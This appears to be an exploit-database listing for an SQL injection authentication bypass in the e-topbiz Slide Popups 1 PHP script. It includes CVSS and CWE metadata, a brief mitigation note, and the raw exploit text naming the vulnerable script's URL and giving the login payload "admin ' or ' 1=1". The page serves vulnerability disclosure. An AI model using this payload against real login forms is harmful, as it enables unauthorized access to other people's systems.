header-logo
Suggest Exploit
vendor:
Slide Popups
by:
Hussin X
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Slide Popups
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:e-topbiz:slide_popups:1
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection Vulnerability

The e-topbiz Slide Popups 1 php script is vulnerable to SQL Injection. An attacker can bypass authentication by injecting ' or ' 1=1 in the login form.

Mitigation:

The vendor should sanitize user inputs to prevent SQL Injection attacks. Users should also ensure they are using the latest patched version of the script.
Source

Exploit-DB raw data:

e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com<http://www.IQ-TY.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script    : http://e-topbiz.com/oprema/pages/slidepop1.php

_____

ExploiT
_______

admin ' or ' 1=1

# login....


IQ-SecuritY FoRuM

Navigation

Suggest Exploit

Services By CQR